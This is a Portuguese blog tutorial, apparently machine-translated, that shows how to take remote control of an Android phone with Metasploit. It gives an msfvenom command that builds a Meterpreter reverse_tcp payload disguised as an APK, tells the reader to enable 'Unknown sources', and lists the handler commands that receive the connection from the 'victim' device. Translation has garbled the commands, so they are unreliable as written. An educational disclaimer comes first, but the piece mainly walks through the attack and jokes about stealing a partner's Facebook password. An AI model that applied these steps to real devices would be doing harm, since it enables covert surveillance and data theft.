Pular para o conteĂşdo principal

Hackeando um smartphone Android

Hackeando um smartphone ou um tablet Android com o Metasploit

NB: Todas as informaçþes contidas no artigo a seguir são apenas para fins educacionais, portanto, o autor não serå responsabilizado pelo abuso de tais informaçþes pelos usuårios do site, se elas forem usadas para fins ilegais.
Nos guias anteriores do livro de endereços do Metasploit Framework , analisamos vĂĄrias possibilidades de ação do software, concentrando-nos mais em ataques direcionados a PCs com Windows, exceto em alguns casos. Nos Ăşltimos anos, o mercado abriu suas portas para smartphones e tablets , dispositivos que rapidamente ganharam mais e mais popularidade, superando os pais de computadores acima de tudo com relação ao uso da rede.
Para um hacker, como para uma multinacional, deixar escapar essa fatia importante do mercado, seria ficar para trĂĄs com os tempos, sendo inevitavelmente destinado a sucumbir. Ă‰ por esse motivo que neste tutorial eu quero re-propor o primeiro guia para o livro de endereços, revisitado em uma chave mĂłvel .
O processo nĂŁo difere muito do descrito acima, exceto por alguns passos em que a palavra AndroidsubstituirĂĄ a palavra Windows.
Lembremo-nos de que, sendo puramente para fins de teste, este guia encontra muito poucas aplicaçþes no mundo real. AlĂŠm disso, em quantos vocĂŞ acha que eles podem iniciar um programa ou aplicativo que literalmente nĂŁo serve para nada, se nĂŁo para conceder acesso a estranhos ao seu dispositivo? A resposta a essa pergunta seria mais adequada para um ensaio sobre Engenharia Social do que sobre Exploração, entĂŁo vamos nos concentrar em como obter acesso ao dispositivo mĂłvel, e nĂŁo em apropriação indĂŠbita da senha do Facebook do seu parceiro, sem esquecer o fato de que Uma vez que vocĂŞ tenha acesso remoto ao dispositivo, o resto serĂĄ uma brisa.

Criar um apk infectado

Vamos começar criando um apk para instalar no dispositivo da vĂ­tima. Apk (Android Package) ĂŠ a extensĂŁo que distingue os arquivos de aplicativos Android. Quanto aos executĂĄveis ​​do Windows, o Metasploit tambĂŠm fornece o mĂłdulo de criação de arquivos apk. Em seguida, digite no terminal ou msfconsole o seguinte comando, que retornarĂĄ um arquivo apk, pronto para ser baixado e instalado no dispositivo vĂ­tima.
  1. msfvenom -p androide / meterpreter / reverse_tcp LHOST = [ip_machine_attaching] LPORT = [porta_de_a_conexao] -o [nome do arquivo] .apk

Hacking Android Metasploit - Crie payloads de arquivos APK msfvenom
A carga estĂĄ pronta, nĂłs sĂł temos que trazĂŞ-lo para o dispositivo mĂłvel.

Ativar "Fontes desconhecidas" no Android

Aviso: o arquivo que contĂŠm a carga Ăştil nĂŁo estĂĄ assinado, portanto, devemos desativar o controle das fontes de segurança para poder instalar o arquivo apk no dispositivo. Para fazer isso, vĂĄ para Configuraçþes -> segurança e ative o item Fontes desconhecidas .
Ativar origens Android desconhecidas

Definir o manipulador

Uma vez que o controle das fontes seguras no dispositivo foi desativado, iniciamos o msfconsole com o comando msfconsole e definimos um manipulador android genĂŠrico
  1. usar exploit / multi / handler
  2. definir PAYLOAD android / meterpreter / reverse_tcp
  3. definir LHOST [ip_matting_attaching]
  4. defina LPORT [port_for_the_connection]
  5. corrida

Hacking Android Metasploit - Definir manipulador

Baixe e instale a carga Ăştil

Vamos mover o dispositivo mĂłvel, baixar o arquivo apk recĂŠm-criado e instalĂĄ-lo. NĂŁo tendo um dispositivo Android disponĂ­vel, inclinei-me em uma mĂĄquina virtual.
Hacking Android Metasploit - Baixar apk
Hacking Android Metasploit - Instalar apk

Sucesso !!

Assim que a vĂ­tima inicia o aplicativo chamado MainActivity, o smartphone ou tablet estĂĄ sob nosso controle
Hackeando o Android Metasploit - Start MainActivity
Hacking Android Metasploit - Meterpreter sysinfo
Graças ao artigo do Baty !

ComentĂĄrios

Ebook

Postagens mais visitadas

BotĂŁo Fechar
Verificado pela Leadster
BotĂŁo Fechar
Logo